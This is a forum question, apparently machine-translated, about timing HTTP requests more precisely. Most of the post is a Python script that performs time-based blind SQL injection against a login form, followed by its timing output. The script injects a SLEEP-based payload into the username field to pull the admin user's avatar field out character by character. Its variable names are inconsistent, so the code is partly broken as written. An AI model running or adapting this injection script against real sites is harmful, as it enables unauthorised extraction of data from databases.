提问人:Shinomoto Asakura 提问时间:5/21/2023 更新时间:5/21/2023 访问量:44
如何使用python请求更精确地计算经过的时间?
How to be more precise calculation elapsed time using python request?
问:
我正在尝试模拟一个SQLMap,它绘制了一个基于时间的SQL注入。
resultado = ""
listaCaracteres = string.ascii_letters + string.digits + "._-@/"
delay = 5
tamanhoCampo = 30
for i in range(1,tamanhoCampo+1):
caracterFound = False
for char in listaCaracters:
data = {
"username": f"teste' OR IF((SELECT substring(avatar,{i},1) FROM users WHERE username='admin')='{caracter}',SLEEP({delay}),1)#",
"password": "teste"
}
startTime = time.time()
try:
# print(f"[+] Iniciando Requisição - posição {i} caracter {caracter}")
resp = requests.post(url, headers=headers, cookies=cookies, data=data)
except Exceptions as e:
print(e)
endTime = time.time()
tempoTotal = endTime - startTime
print(f"[*] Pos. {i} {caracter} {tempoTotal}")
if tempoTotal >= delay:
print(f"[+] Caracter encontrado {caracter} {tempoTotal}")
resultado += caracter
caracterEncontrado = True
delay = 5
break
if not caracterEncontrado:
delay += 1
print(f"[*] Caracter não encontrado, aumentando o tempo de resposta para {delay} segundos")
print(resultado)
调试结果
[*] Iniciando o DUMP.
[*] Pos. 1 a 0.41757917404174805
[*] Pos. 1 b 0.42841196060180664
[*] Pos. 1 c 0.42807817459106445
[*] Pos. 1 d 1.420304536819458
[*] Pos. 1 e 0.4183344841003418
[*] Pos. 1 f 0.4205491542816162
[*] Pos. 1 g 0.41797685623168945
[*] Pos. 1 h 0.41671323776245117
[*] Pos. 1 i 0.41751718521118164
[*] Pos. 1 j 0.4145169258117676
[*] Pos. 1 k 0.4157712459564209
[*] Pos. 1 l 0.4163017272949219
[*] Pos. 1 m 0.41348886489868164
[*] Pos. 1 n 0.4273350238800049
[*] Pos. 1 o 0.42464113235473633
[*] Pos. 1 p 0.4265732765197754
[*] Pos. 1 q 0.4321424961090088
[*] Pos. 1 r 0.4281890392303467
[*] Pos. 1 s 0.41872739791870117
[*] Pos. 1 t 0.41807007789611816
[*] Pos. 1 u 4.920653581619263
[*] Pos. 1 v 0.41268229484558105
[*] Pos. 1 w 0.47426342964172363
[*] Pos. 1 x 0.4102909564971924
[*] Pos. 1 y 0.41750526428222656
[*] Pos. 1 z 0.41268014907836914
[*] Pos. 1 A 0.412386417388916
[*] Pos. 1 B 0.4086577892303467
[*] Pos. 1 C 0.41196632385253906
Pos.1 字母 u 给出了将近 5 秒的时间,实际上是 4.9 秒,这完全是我正在寻找的头像字段中的第一个字符,每个脚本执行都给了我 4.9 秒或超过 5 秒,有时这会进入第一个条件而不是!
那么,如何更准确地计算呢?
答: 暂无答案
评论
delayround